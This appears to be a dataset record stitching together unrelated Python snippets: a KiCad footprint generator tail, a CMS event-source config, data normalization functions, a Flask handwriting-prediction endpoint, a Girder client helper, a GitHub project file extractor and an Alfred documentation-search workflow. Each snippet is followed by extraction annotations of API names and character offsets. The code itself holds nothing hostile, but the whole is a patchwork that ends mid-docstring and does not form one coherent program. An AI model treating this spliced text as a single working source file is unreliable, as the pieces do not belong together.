yb = (i+1) * pitch - pad_size[1]/2 - pad_silk_off
kicad_mod.append(Line(start=[x1-off, ya],end=[x1-off, yb],
width=configuration['silk_line_width'], layer='F.SilkS'))
kicad_mod.append(Line(start=[x2+off, ya],end=[x2+off, yb],
width=configuration['silk_line_width'], layer='F.SilkS'))
#draw the tabs at each end
def offsetPoly(poly_points, o , center_x, center_y):
new_points = []
for point in poly_points:
new_points.append(
{
'y': point['y'] + (o if point['y'] > center_y else -o),
'x': point['x'] + (o if point['x'] > center_x else -o)
}
)
return new_points
tab = [
{'y': y1,'x': x_loc-TW/2},
{'y': y1-TL,'x': x_loc-TW/2},
{'y': y1-TL,'x': x_loc+TW/2},
{'y': y1,'x': x_loc+TW/2},
]
kicad_mod.append(PolygoneLine(polygone=tab,
width=configuration['fab_line_width'], layer='F.Fab'))
kicad_mod.append(PolygoneLine(polygone=tab, y_mirror=B/2,
width=configuration['fab_line_width'], layer='F.Fab'))
tap_off = offsetPoly(tab, off, x_loc, B/2)
kicad_mod.append(PolygoneLine(polygone=tap_off,
width=configuration['silk_line_width'], layer='F.SilkS'))
kicad_mod.append(PolygoneLine(polygone=tap_off, y_mirror=B/2,
width=configuration['silk_line_width'], layer='F.SilkS'))
bounding_box['top'] = y1 - TL
bounding_box['bottom'] = y2 + TL
#inner-tab
T = 2
tab = [
{'y': y1-off,'x': x_loc-TW/2-off+T},
{'y': y1-off-TL+T,'x': x_loc-TW/2-off+T},
{'y': y1-off-TL+T,'x': x_loc+TW/2+off-T},
{'y': y1-off,'x': x_loc+TW/2+off-T},
]
kicad_mod.append(PolygoneLine(polygone=tab,
width=configuration['silk_line_width'], layer='F.SilkS'))
kicad_mod.append(PolygoneLine(polygone=tab,y_mirror=B/2,
width=configuration['silk_line_width'], layer='F.SilkS'))
#pin-1 marker
x = x1 - 1.5
m = 0.4
pin = [
{'x': x,'y': 0},
{'x': x-2*m,'y': -m},
{'x': x-2*m,'y': +m},
{'x': x,'y': 0},
]
kicad_mod.append(PolygoneLine(polygone=pin,
width=configuration['silk_line_width'], layer='F.SilkS'))
sl=3
pin = [
{'x': body_edge['left'], 'y': -sl/2},
{'x': body_edge['left'] + sl/sqrt(2), 'y': 0},
{'x': body_edge['left'], 'y': sl/2}
]
kicad_mod.append(PolygoneLine(polygone=pin,
width=configuration['fab_line_width'], layer='F.Fab'))
########################### CrtYd #################################
cx1 = roundToBase(bounding_box['left']-configuration['courtyard_offset']['connector'], configuration['courtyard_grid'])
cy1 = roundToBase(bounding_box['top']-configuration['courtyard_offset']['connector'], configuration['courtyard_grid'])
cx2 = roundToBase(bounding_box['right']+configuration['courtyard_offset']['connector'], configuration['courtyard_grid'])
cy2 = roundToBase(bounding_box['bottom'] + configuration['courtyard_offset']['connector'], configuration['courtyard_grid'])
kicad_mod.append(RectLine(
start=[cx1, cy1], end=[cx2, cy2],
layer='F.CrtYd', width=configuration['courtyard_line_width']))
######################### Text Fields ###############################
addTextFields(kicad_mod=kicad_mod, configuration=configuration, body_edges=body_edge,
courtyard={'top':cy1, 'bottom':cy2}, fp_name=footprint_name, text_y_inside_position='bottom')
##################### Output and 3d model ############################
model3d_path_prefix = configuration.get('3d_model_prefix','${KICAD6_3DMODEL_DIR}/')
lib_name = configuration['lib_name_format_string'].format(series=series, man=manufacturer)
model_name = '{model3d_path_prefix:s}{lib_name:s}.3dshapes/{fp_name:s}.wrl'.format(
model3d_path_prefix=model3d_path_prefix, lib_name=lib_name, fp_name=footprint_name)
kicad_mod.append(Model(filename=model_name))
output_dir = '{lib_name:s}.pretty/'.format(lib_name=lib_name)
if not os.path.isdir(output_dir): #returns false if path does not yet exist!! (Does not check path validity)
os.makedirs(output_dir)
filename = '{outdir:s}{fp_name:s}.kicad_mod'.format(outdir=output_dir, fp_name=footprint_name)
file_handler = KicadFileHandler(kicad_mod)
file_handler.writeFile(filename)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='use confing .yaml files to create footprints.')
parser.add_argument('--global_config', type=str, nargs='?', help='the config file defining how the footprint will look like. (KLC)', default='../../tools/global_config_files/config_KLCv3.0.yaml')
parser.add_argument('--series_config', type=str, nargs='?', help='the config file defining series parameters.', default='../conn_config_KLCv3.yaml')
args = parser.parse_args()
with open(args.global_config, 'r') as config_stream:
try:
configuration = yaml.safe_load(config_stream)
except yaml.YAMLError as exc:
print(exc)
with open(args.series_config, 'r') as config_stream:
try:
configuration.update(yaml.safe_load(config_stream))
except yaml.YAMLError as exc:
print(exc)
for version in version_params:
for pins_per_row in pins_per_row_range:
generate_one_footprint(pins_per_row, version_params[version], configuration)
| [
"os.makedirs",
"argparse.ArgumentParser",
"os.path.join",
"footprint_text_fields.addTextFields",
"math.sqrt",
"yaml.safe_load",
"os.path.isdir"
] | [((892, 935), 'os.path.join', 'os.path.join', (['sys.path[0]', '""".."""', '""".."""', '""".."""'], {}), "(sys.path[0], '..', '..', '..')\n", (904, 935), False, 'import os\n'), ((1089, 1135), 'os.path.join', 'os.path.join', (['sys.path[0]', '""".."""', '""".."""', '"""tools"""'], {}), "(sys.path[0], '..', '..', 'tools')\n", (1101, 1135), False, 'import os\n'), ((11527, 11718), 'footprint_text_fields.addTextFields', 'addTextFields', ([], {'kicad_mod': 'kicad_mod', 'configuration': 'configuration', 'body_edges': 'body_edge', 'courtyard': "{'top': cy1, 'bottom': cy2}", 'fp_name': 'footprint_name', 'text_y_inside_position': '"""bottom"""'}), "(kicad_mod=kicad_mod, configuration=configuration, body_edges=\n body_edge, courtyard={'top': cy1, 'bottom': cy2}, fp_name=\n footprint_name, text_y_inside_position='bottom')\n", (11540, 11718), False, 'from footprint_text_fields import addTextFields\n'), ((12642, 12731), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""use confing .yaml files to create footprints."""'}), "(description=\n 'use confing .yaml files to create footprints.')\n", (12665, 12731), False, 'import argparse\n'), ((12282, 12307), 'os.path.isdir', 'os.path.isdir', (['output_dir'], {}), '(output_dir)\n', (12295, 12307), False, 'import os\n'), ((12392, 12415), 'os.makedirs', 'os.makedirs', (['output_dir'], {}), '(output_dir)\n', (12403, 12415), False, 'import os\n'), ((13210, 13239), 'yaml.safe_load', 'yaml.safe_load', (['config_stream'], {}), '(config_stream)\n', (13224, 13239), False, 'import yaml\n'), ((13405, 13434), 'yaml.safe_load', 'yaml.safe_load', (['config_stream'], {}), '(config_stream)\n', (13419, 13434), False, 'import yaml\n'), ((10550, 10557), 'math.sqrt', 'sqrt', (['(2)'], {}), '(2)\n', (10554, 10557), False, 'from math import sqrt\n')] |
# Configuration file for EmptySource
import FWCore.ParameterSet.Config as cms
process = cms.Process("TEST")
process.load("FWCore.Framework.test.cmsExceptionsFatal_cff")
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(8*5)
)
runToLumi = ((2,1),(10,3),(20,7) )
def findRunForLumi( lumi) :
lastRun = runToLumi[0][0]
for r,l in runToLumi:
if l > lumi:
break
lastRun = r
return lastRun
process.source = cms.Source("EmptySource",
firstLuminosityBlock = cms.untracked.uint32(1),
firstLuminosityBlockForEachRun = cms.untracked.VLuminosityBlockID(*[cms.LuminosityBlockID(x,y) for x,y in runToLumi]),
numberEventsInLuminosityBlock = cms.untracked.uint32(5),
firstTime = cms.untracked.uint64(1000),
timeBetweenEvents = cms.untracked.uint64(10)
)
ids = cms.VEventID()
numberOfEventsInLumi = 0
numberOfEventsPerLumi = process.source.numberEventsInLuminosityBlock.value()
lumi = process.source.firstLuminosityBlock.value()
event=0
oldRun = 2
for i in xrange(process.maxEvents.input.value()):
numberOfEventsInLumi +=1
event += 1
run = findRunForLumi(lumi)
if numberOfEventsInLumi > numberOfEventsPerLumi:
numberOfEventsInLumi=1
lumi += 1
run = findRunForLumi(lumi)
if run != oldRun:
event = 1
oldRun = run
ids.append(cms.EventID(run,lumi,event))
process.check = cms.EDAnalyzer("EventIDChecker", eventSequence = cms.untracked(ids))
process.print1 = cms.OutputModule("AsciiOutputModule")
process.p = cms.EndPath(process.check+process.print1)
| [
"FWCore.ParameterSet.Config.OutputModule",
"FWCore.ParameterSet.Config.LuminosityBlockID",
"FWCore.ParameterSet.Config.untracked.uint64",
"FWCore.ParameterSet.Config.VEventID",
"FWCore.ParameterSet.Config.EndPath",
"FWCore.ParameterSet.Config.EventID",
"FWCore.ParameterSet.Config.untracked",
"FWCore.P... | [((90, 109), 'FWCore.ParameterSet.Config.Process', 'cms.Process', (['"""TEST"""'], {}), "('TEST')\n", (101, 109), True, 'import FWCore.ParameterSet.Config as cms\n'), ((813, 827), 'FWCore.ParameterSet.Config.VEventID', 'cms.VEventID', ([], {}), '()\n', (825, 827), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1460, 1497), 'FWCore.ParameterSet.Config.OutputModule', 'cms.OutputModule', (['"""AsciiOutputModule"""'], {}), "('AsciiOutputModule')\n", (1476, 1497), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1511, 1554), 'FWCore.ParameterSet.Config.EndPath', 'cms.EndPath', (['(process.check + process.print1)'], {}), '(process.check + process.print1)\n', (1522, 1554), True, 'import FWCore.ParameterSet.Config as cms\n'), ((225, 251), 'FWCore.ParameterSet.Config.untracked.int32', 'cms.untracked.int32', (['(8 * 5)'], {}), '(8 * 5)\n', (244, 251), True, 'import FWCore.ParameterSet.Config as cms\n'), ((502, 525), 'FWCore.ParameterSet.Config.untracked.uint32', 'cms.untracked.uint32', (['(1)'], {}), '(1)\n', (522, 525), True, 'import FWCore.ParameterSet.Config as cms\n'), ((686, 709), 'FWCore.ParameterSet.Config.untracked.uint32', 'cms.untracked.uint32', (['(5)'], {}), '(5)\n', (706, 709), True, 'import FWCore.ParameterSet.Config as cms\n'), ((727, 753), 'FWCore.ParameterSet.Config.untracked.uint64', 'cms.untracked.uint64', (['(1000)'], {}), '(1000)\n', (747, 753), True, 'import FWCore.ParameterSet.Config as cms\n'), ((779, 803), 'FWCore.ParameterSet.Config.untracked.uint64', 'cms.untracked.uint64', (['(10)'], {}), '(10)\n', (799, 803), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1329, 1358), 'FWCore.ParameterSet.Config.EventID', 'cms.EventID', (['run', 'lumi', 'event'], {}), '(run, lumi, event)\n', (1340, 1358), True, 'import FWCore.ParameterSet.Config as cms\n'), ((1423, 1441), 'FWCore.ParameterSet.Config.untracked', 'cms.untracked', (['ids'], {}), '(ids)\n', (1436, 1441), True, 'import FWCore.ParameterSet.Config as cms\n'), ((599, 626), 'FWCore.ParameterSet.Config.LuminosityBlockID', 'cms.LuminosityBlockID', (['x', 'y'], {}), '(x, y)\n', (620, 626), True, 'import FWCore.ParameterSet.Config as cms\n')] |
# -*- coding: utf-8 -*-
"""
Provides functions for data transformation (currently only LLS) and
normalization.
"""
import numpy as np
def transform(raw_data, mode, direction='direct', **kwargs):
"""
Apply mathematical transformations to data.
Parameters
----------
raw_data : ndarray
2D numpy array with the shape (N, M) containing N data rows to be
smoothed. Each data row is represented by row in numpy array and
contains M values. If only one data row is present, raw_data has the
shape (1, M).
mode : str
Maths used for transformation. Allowed mode is 'log_log_sqrt' only at
the moment which first takes the square root and then does the
logarithm twice.
direction : str, optional
Gives the direction of the tranformation. If 'direct', the data is
transformed, if 'inverse', the inverse of the transformation is
calculated. The default is 'direct'.
**kwargs for the different modes
mode is 'log_log_sqrt' and direction is 'inverse':
min_value : float
Original minimum value of the data before transformation. Has
to be known because it is lost upon transformation. Default is
1.
Raises
------
ValueError
If the value passed as mode or direction is not understood.
Returns
-------
raw_data : ndarray
Transformed data with the same shape as raw_data.
"""
# list of allowed modes for data transformation
transform_modes = ['log_log_sqrt']
if direction == 'direct':
if mode == transform_modes[0]:
minimum_value = np.min(raw_data)
raw_data -= minimum_value
raw_data = np.log(np.log(np.sqrt(raw_data + 1) + 1) + 1)
else:
raise ValueError('No valid transform mode entered. Allowed modes '
'are {0}'.format(transform_modes))
elif direction == 'inverse':
if mode == transform_modes[0]:
minimum_value = kwargs.get('min_value', 1)
raw_data = (np.exp(np.exp(raw_data) - 1) - 1)**2 - 1
raw_data += minimum_value
else:
raise ValueError('No valid transform mode entered. Allowed modes '
'are {0}'.format(transform_modes))
else:
raise ValueError('No valid transform direction entered. Allowed '
'directions are [\'direct\', \'inverse\']')
return raw_data
def normalize(raw_data, mode, factor=1, **kwargs):
raw_data = np.asarray(raw_data)
# list of allowed modes for normalization
normalize_modes = ['total_intensity']
if mode == normalize_modes[0]:
x_data_points = raw_data.shape[1]
x_data = kwargs.get('x_data', np.arange(x_data_points))
conversion_factor = 1/np.repeat(np.trapz(raw_data, x=x_data, axis=1),
x_data_points).reshape(
(-1, x_data_points))
normalized_data = raw_data * conversion_factor * factor
else:
raise ValueError('No valid normalization mode entered. Allowed modes '
'are {0}'.format(normalize_modes))
return normalized_data
| [
"numpy.trapz",
"numpy.sqrt",
"numpy.asarray",
"numpy.exp",
"numpy.min",
"numpy.arange"
] | [((2588, 2608), 'numpy.asarray', 'np.asarray', (['raw_data'], {}), '(raw_data)\n', (2598, 2608), True, 'import numpy as np\n'), ((1677, 1693), 'numpy.min', 'np.min', (['raw_data'], {}), '(raw_data)\n', (1683, 1693), True, 'import numpy as np\n'), ((2814, 2838), 'numpy.arange', 'np.arange', (['x_data_points'], {}), '(x_data_points)\n', (2823, 2838), True, 'import numpy as np\n'), ((2880, 2916), 'numpy.trapz', 'np.trapz', (['raw_data'], {'x': 'x_data', 'axis': '(1)'}), '(raw_data, x=x_data, axis=1)\n', (2888, 2916), True, 'import numpy as np\n'), ((1769, 1790), 'numpy.sqrt', 'np.sqrt', (['(raw_data + 1)'], {}), '(raw_data + 1)\n', (1776, 1790), True, 'import numpy as np\n'), ((2117, 2133), 'numpy.exp', 'np.exp', (['raw_data'], {}), '(raw_data)\n', (2123, 2133), True, 'import numpy as np\n')] |
#Predictions performed by this module
#dependencies
import base64
import numpy as np
import io
from PIL import Image
import keras
from keras import backend as K
from keras.models import Sequential
from keras.models import load_model
from keras.preprocessing.image import ImageDataGenerator, img_to_array
from model import Model, DecoderType
from main import infer2
from flask import request
from flask import jsonify
from flask import Flask
from imageio import imread
app = Flask(__name__)
"""
def get_model():
This function loads the already-built keras model
global model
model = load_model('model.h5')
print("Model loaded!")"""
def preprocess_image(image, target_size):
if image.mode != "RGB":
image = image.convert("RGB")
image = image.resize(target_size)
image = img_to_array(image)
image = np.expand_dims(image, axis=0)
return image
"""print(" * Loading Keras model ... ")
get_model()"""
@app.route("/predict", methods=["POST"])
def predict():
"""
whenever something is posted from /predict,
this function will process the info posted through POST http method
message: json from POST method
encoded: key is 'image', value is base64encoded image sent from client
decoded: as it says
image: decoded is bytes in a file, not an actual image,
image.open converts those bytes into PIL file
"""
message = request.get_json(force=True)
encoded = message['image']
encoded = encoded.replace("data:image/jpeg;base64,", "")
print(encoded)
decoded = base64.b64decode(encoded)
image = imread(io.BytesIO(decoded))
"""
processed_image = preprocess_image(image, target_size=(224,224))"""
"""prediction = model.predict(processed_image).tolist()"""
model = Model(list(open("/home/shikhar/Desktop/simpleHTR/SimpleHTR/model/charList.txt").read()), decoder_type=0, must_restore=True, dump=True)
response = infer2(model, image)
response = {
'text': response['text'],
'probability': str(response['probability'])
}
return jsonify(response)
@app.route("/", methods=["GET"])
def hello():
return 'Hello'
if __name__ == "__main__":
app.run(host='0.0.0.0', port=5000) | [
"keras.preprocessing.image.img_to_array",
"flask.Flask",
"io.BytesIO",
"base64.b64decode",
"flask.request.get_json",
"numpy.expand_dims",
"main.infer2",
"flask.jsonify"
] | [((478, 493), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (483, 493), False, 'from flask import Flask\n'), ((815, 834), 'keras.preprocessing.image.img_to_array', 'img_to_array', (['image'], {}), '(image)\n', (827, 834), False, 'from keras.preprocessing.image import ImageDataGenerator, img_to_array\n'), ((847, 876), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(0)'}), '(image, axis=0)\n', (861, 876), True, 'import numpy as np\n'), ((1412, 1440), 'flask.request.get_json', 'request.get_json', ([], {'force': '(True)'}), '(force=True)\n', (1428, 1440), False, 'from flask import request\n'), ((1566, 1591), 'base64.b64decode', 'base64.b64decode', (['encoded'], {}), '(encoded)\n', (1582, 1591), False, 'import base64\n'), ((1938, 1958), 'main.infer2', 'infer2', (['model', 'image'], {}), '(model, image)\n', (1944, 1958), False, 'from main import infer2\n'), ((2085, 2102), 'flask.jsonify', 'jsonify', (['response'], {}), '(response)\n', (2092, 2102), False, 'from flask import jsonify\n'), ((1611, 1630), 'io.BytesIO', 'io.BytesIO', (['decoded'], {}), '(decoded)\n', (1621, 1630), False, 'import io\n')] |
from typing import Any
import msgpack
from app.core.config import settings
from girder_client import GirderClient
from fastapi import HTTPException
from fastapi import Response
cache_settings = {
"directory": "/tmp/cache",
"eviction_policy": "least-frequently-used",
"size_limit": 2**20, # 1g
}
_gc = None
def get_girder_client(girder_token):
if girder_token is None:
raise HTTPException(status_code=400, detail="Invalid token.")
global _gc
if _gc is None:
_gc = GirderClient(apiUrl=settings.GIRDER_API_URL, cacheSettings=cache_settings)
_gc.setToken(girder_token)
return _gc
class MsgpackResponse(Response):
media_type = "application/msgpack"
def render(self, content: Any) -> bytes:
return msgpack.packb(content)
| [
"msgpack.packb",
"girder_client.GirderClient",
"fastapi.HTTPException"
] | [((406, 461), 'fastapi.HTTPException', 'HTTPException', ([], {'status_code': '(400)', 'detail': '"""Invalid token."""'}), "(status_code=400, detail='Invalid token.')\n", (419, 461), False, 'from fastapi import HTTPException\n'), ((512, 586), 'girder_client.GirderClient', 'GirderClient', ([], {'apiUrl': 'settings.GIRDER_API_URL', 'cacheSettings': 'cache_settings'}), '(apiUrl=settings.GIRDER_API_URL, cacheSettings=cache_settings)\n', (524, 586), False, 'from girder_client import GirderClient\n'), ((770, 792), 'msgpack.packb', 'msgpack.packb', (['content'], {}), '(content)\n', (783, 792), False, 'import msgpack\n')] |
import collections
import glob
import json
import os
import random
import re
from typing import Tuple, Iterator, List, Dict, Optional
from src.data.preprocess.example import Example
_DEFAULT_STATS_BOUNDARIES = {
"Python": {"max_line_len": (37, 741), "content_len": (111, 42476)},
"Java": {"max_line_len": (56, 177), "content_len": (305, 48661)},
"Kotlin": {"max_line_len": (25, 158), "content_len": (69, 20402)},
}
_BAD_TEXT_REGEX = re.compile(r"auto[- ]?generated file", flags=re.IGNORECASE)
_BUCKET_SIZE = 1_000_000
class GitProjectExtractor:
def __init__(
self,
raw_data_path: str,
random_seed: int,
val_part: Optional[float],
test_part: Optional[float],
languages: Tuple[str] = ("Python",),
):
self._path: str = raw_data_path
self._rng: random.Random = random.Random(random_seed)
self._found_files_amount: Optional[int] = None
self._holdout_sizes: Dict[str, float] = dict()
self._holdout_sizes["val"] = val_part if val_part is not None else 0.0
self._holdout_sizes["test"] = test_part if test_part is not None else 0.0
assert self._holdout_sizes["val"] + self._holdout_sizes["test"] <= 1.0
self._holdout_sizes["train"] = 1.0 - self._holdout_sizes["val"] - self._holdout_sizes["test"]
self._processed_projects: Optional[Dict[str, List[List[Tuple[str, str, str, str]]]]] = None
print(f"Extracting projects metainfo...")
self._extract_projects(languages)
def get_num_examples(self, holdout: str) -> int:
assert self._found_files_amount is not None
return int(self._found_files_amount * self._holdout_sizes[holdout])
# Main method
def get_examples(self, holdout: str) -> Iterator[Example]:
"""Read all files in specified language from dataset and return a project iterator"
:param holdout: which holdout to return. Can be either "train", "val" and "test"
:return: Iterator, which returns projects - Lists of Tuples, each of which represent project's files
"""
return self._generate_examples_iter(holdout)
# -------------------------------------- Stage methods -------------------------------------- #
def _extract_projects(self, languages: Tuple[str]):
lang_files = self._get_lang_files(languages)
projects = self._get_files_projects(lang_files)
found_projects_amount = len(projects)
(
processed_projects,
skipped_projects,
self._found_files_amount,
) = self._process_projects(projects)
self._processed_projects = dict()
self._rng.shuffle(processed_projects)
train_projects_amount = int(self._holdout_sizes["train"] * len(processed_projects))
val_projects_amount = int(self._holdout_sizes["val"] * len(processed_projects))
self._processed_projects["train"] = processed_projects[:train_projects_amount]
self._processed_projects["val"] = processed_projects[
train_projects_amount : train_projects_amount + val_projects_amount
]
self._processed_projects["test"] = processed_projects[train_projects_amount + val_projects_amount :]
print(
f"Found {found_projects_amount} projects with {self._found_files_amount} files, "
f"skipped {len(skipped_projects)} projects\n"
)
if len(skipped_projects) != 0:
print(f"Skipped projects: {skipped_projects}\n")
def _generate_examples_iter(self, holdout: str) -> Iterator[Example]:
"""Yield all project files, one project at a time"""
def read_file(path):
with open(path, "rt", encoding="utf-8", errors="ignore") as f:
return f.read()
bucket_to_shuffle: List[Example] = []
assert self._processed_projects is not None
for project in self._processed_projects[holdout]:
examples = (
Example(language, proj_name, filename, read_file(path))
for language, proj_name, filename, path in project
)
bucket_to_shuffle.extend(
example
for example in examples
if GitProjectExtractor._is_good_example(example.language, example.file_name, example.source_code)
)
if len(bucket_to_shuffle) > _BUCKET_SIZE:
self._rng.shuffle(bucket_to_shuffle)
yield from bucket_to_shuffle
bucket_to_shuffle = []
yield from bucket_to_shuffle
@staticmethod
def _is_good_example(language: str, filename: str, source_code: str) -> bool:
if not filename or not source_code:
return False
# Check stats
if not (
_DEFAULT_STATS_BOUNDARIES[language]["content_len"][0]
<= len(source_code)
<= _DEFAULT_STATS_BOUNDARIES[language]["content_len"][1]
and _DEFAULT_STATS_BOUNDARIES[language]["max_line_len"][0]
<= max(len(line) for line in source_code.split("\n"))
<= _DEFAULT_STATS_BOUNDARIES[language]["max_line_len"][1]
):
return False
# Regex check
if re.search(_BAD_TEXT_REGEX, source_code):
return False
return True
# --------------------------------- Paths processing methods -------------------------------- #
def _get_lang_files(self, languages: Tuple[str]) -> List[Tuple[str, str]]:
res: List[Tuple[str, str]] = []
for language in languages:
lang_files = glob.glob(
os.path.join(
self._path,
"languages",
language,
".*",
"*",
"*",
"**",
"*.*",
),
recursive=True,
)
assert lang_files, f"There are no files in {self._path} with language {language}"
print(f"Found {len(lang_files)} files' metainfos for {language} lang")
res.extend((lang_file, language) for lang_file in lang_files)
return res
@staticmethod
def _get_files_projects(lang_files: List[Tuple[str, str]]) -> List[Tuple[str, List[Tuple[str, str]]]]:
"""Group all files by projects"""
projects = collections.defaultdict(list)
for (file, lang) in lang_files:
if os.path.isfile(file):
project_name = os.sep.join(file.split(os.sep)[-3:-1])
projects[project_name].append((file, lang))
return list(projects.items())
def _process_projects(
self, projects: List[Tuple[str, List[Tuple[str, str]]]]
) -> Tuple[List[List[Tuple[str, str, str, str]]], List[str], int]:
"""Search for projects, extract real project names from dataset
:param projects: output of _get_files_projects.
:return: a Tuple,
first item of which is a List, each item of which represents a single GitHub project
and is itself a List, each item of which represents a single file in the project
which is written in the specified language
and is itself a Tuple, first item of which is the path to a file in the project structure,
the second one is the path to the file in our dataset structure
the third one is the language of the file.
second item is the length of projects list.
"""
processed_projects = []
skipped_projects = []
files_amount = 0
for project_name, files in projects:
author, repo, branch, filename = files[0][0].split(os.sep)[-4:]
paths_dict_path = os.path.join(
self._path,
"repositories",
author,
repo,
branch,
"paths.json",
)
if os.path.exists(paths_dict_path):
with open(paths_dict_path, "rt") as f:
paths_dict = json.load(f)
names_and_paths = []
for (file, lang) in files:
if os.path.basename(file) in paths_dict:
names_and_paths.append(
(
lang,
project_name,
paths_dict[os.path.basename(file)],
file,
)
)
processed_projects.append(names_and_paths)
files_amount += len(names_and_paths)
else:
skipped_projects.append(f"{author}/{repo}")
return processed_projects, skipped_projects, files_amount
| [
"os.path.exists",
"re.compile",
"random.Random",
"os.path.join",
"os.path.isfile",
"collections.defaultdict",
"os.path.basename",
"json.load",
"re.search"
] | [((447, 505), 're.compile', 're.compile', (['"""auto[- ]?generated file"""'], {'flags': 're.IGNORECASE'}), "('auto[- ]?generated file', flags=re.IGNORECASE)\n", (457, 505), False, 'import re\n'), ((845, 871), 'random.Random', 'random.Random', (['random_seed'], {}), '(random_seed)\n', (858, 871), False, 'import random\n'), ((5223, 5262), 're.search', 're.search', (['_BAD_TEXT_REGEX', 'source_code'], {}), '(_BAD_TEXT_REGEX, source_code)\n', (5232, 5262), False, 'import re\n'), ((6377, 6406), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (6400, 6406), False, 'import collections\n'), ((6462, 6482), 'os.path.isfile', 'os.path.isfile', (['file'], {}), '(file)\n', (6476, 6482), False, 'import os\n'), ((7777, 7853), 'os.path.join', 'os.path.join', (['self._path', '"""repositories"""', 'author', 'repo', 'branch', '"""paths.json"""'], {}), "(self._path, 'repositories', author, repo, branch, 'paths.json')\n", (7789, 7853), False, 'import os\n'), ((7980, 8011), 'os.path.exists', 'os.path.exists', (['paths_dict_path'], {}), '(paths_dict_path)\n', (7994, 8011), False, 'import os\n'), ((5617, 5693), 'os.path.join', 'os.path.join', (['self._path', '"""languages"""', 'language', '""".*"""', '"""*"""', '"""*"""', '"""**"""', '"""*.*"""'], {}), "(self._path, 'languages', language, '.*', '*', '*', '**', '*.*')\n", (5629, 5693), False, 'import os\n'), ((8101, 8113), 'json.load', 'json.load', (['f'], {}), '(f)\n', (8110, 8113), False, 'import json\n'), ((8218, 8240), 'os.path.basename', 'os.path.basename', (['file'], {}), '(file)\n', (8234, 8240), False, 'import os\n'), ((8461, 8483), 'os.path.basename', 'os.path.basename', (['file'], {}), '(file)\n', (8477, 8483), False, 'import os\n')] |
#!/usr/bin/python
# encoding: utf-8
from __future__ import print_function, unicode_literals, absolute_import
import functools
import re
import sys
from textwrap import wrap
from urllib import quote_plus
from algoliasearch.search_client import SearchClient
from config import Config
from workflow import Workflow3, ICON_INFO
# Algolia client
client = SearchClient.create(Config.ALGOLIA_APP_ID, Config.ALGOLIA_SEARCH_ONLY_API_KEY)
index = client.init_index(Config.ALGOLIA_SEARCH_INDEX)
# log
log = None
def cache_key(query, version=Config.DEFAULT_NOVA_VERSION):
"""Make filesystem-friendly cache key"""
key = "{}_{}".format(query, version)
key = key.lower()
key = re.sub(r"[^a-z0-9-_;.]", "-", key)
key = re.sub(r"-+", "-", key)
# log.debug("Cache key : {!r} {!r} -> {!r}".format(query, version, key))
return key
def handle_result(api_dict):
"""Extract relevant info from API result"""
result = {}
for key in {
"objectID",
"version",
"title",
"id",
"permalink",
"content",
"categories",
}:
result[key] = api_dict[key]
return result
def search(query=None, version=Config.DEFAULT_NOVA_VERSION, limit=Config.RESULT_COUNT):
if query:
results = index.search(
query,
{
"facetFilters": ["version:{}".format(version)],
"page": 0,
"hitsPerPage": limit,
},
)
if results is not None and "hits" in results:
return results["hits"]
return []
def main(wf):
if wf.update_available:
# Add a notification to top of Script Filter results
wf.add_item(
"New version available",
"Action this item to install the update",
autocomplete="workflow:update",
icon=ICON_INFO,
)
query = wf.args[0].strip()
# Tag prefix only. Treat as blank query
if query == "v":
query = ""
if not query:
wf.add_item("Search the Nova docs...")
wf.send_feedback()
return 0
# Parse query into query string and tags
words = query.split(" ")
query = []
version = Config.DEFAULT_NOVA_VERSION
for word in words:
if word in Config.SUPPORTED_NOVA_VERSIONS:
version = word.replace("v", "")
else:
query.append(word)
query = " ".join(query)
# log.debug("version: {!r}".format(version))
# log.debug("query: {!r}".format(query))
key = cache_key(query, version)
results = [
handle_result(result)
for result in wf.cached_data(
key, functools.partial(search, query, version), max_age=Config.CACHE_MAX_AGE
)
]
# log.debug("{} results for {!r}, version {!r}".format(len(results), query, version))
# Show results
if not results:
url = "https://www.google.com/search?q={}".format(
quote_plus('"Laravel Nova" {}'.format(query))
)
wf.add_item(
"No matching answers found",
"Shall I try and search Google?",
valid=True,
arg=url,
copytext=url,
quicklookurl=url,
icon=Config.GOOGLE_ICON,
)
for result in results:
subtitle = wrap(result["content"], width=75)[0]
if len(result["content"]) > 75:
subtitle += " ..."
wf.add_item(
uid=result["objectID"],
title=result["title"],
subtitle=subtitle,
arg=result["permalink"],
valid=True,
largetext=result["content"],
copytext=result["permalink"],
quicklookurl=result["permalink"],
icon=Config.NOVA_ICON,
)
# log.debug(result)
wf.send_feedback()
if __name__ == "__main__":
wf = Workflow3(
update_settings={"github_slug": "techouse/alfred-nova-docs", "frequency": 7}
)
log = wf.logger
sys.exit(wf.run(main))
| [
"workflow.Workflow3",
"algoliasearch.search_client.SearchClient.create",
"functools.partial",
"textwrap.wrap",
"re.sub"
] | [((354, 432), 'algoliasearch.search_client.SearchClient.create', 'SearchClient.create', (['Config.ALGOLIA_APP_ID', 'Config.ALGOLIA_SEARCH_ONLY_API_KEY'], {}), '(Config.ALGOLIA_APP_ID, Config.ALGOLIA_SEARCH_ONLY_API_KEY)\n', (373, 432), False, 'from algoliasearch.search_client import SearchClient\n'), ((685, 718), 're.sub', 're.sub', (['"""[^a-z0-9-_;.]"""', '"""-"""', 'key'], {}), "('[^a-z0-9-_;.]', '-', key)\n", (691, 718), False, 'import re\n'), ((730, 752), 're.sub', 're.sub', (['"""-+"""', '"""-"""', 'key'], {}), "('-+', '-', key)\n", (736, 752), False, 'import re\n'), ((3872, 3963), 'workflow.Workflow3', 'Workflow3', ([], {'update_settings': "{'github_slug': 'techouse/alfred-nova-docs', 'frequency': 7}"}), "(update_settings={'github_slug': 'techouse/alfred-nova-docs',\n 'frequency': 7})\n", (3881, 3963), False, 'from workflow import Workflow3, ICON_INFO\n'), ((3315, 3348), 'textwrap.wrap', 'wrap', (["result['content']"], {'width': '(75)'}), "(result['content'], width=75)\n", (3319, 3348), False, 'from textwrap import wrap\n'), ((2666, 2707), 'functools.partial', 'functools.partial', (['search', 'query', 'version'], {}), '(search, query, version)\n', (2683, 2707), False, 'import functools\n')] |
import glob,os,sys
class Path():
'''
>>> paths = Path(source,"*.txt")
>>> for path in paths:
lines = Stream(path)
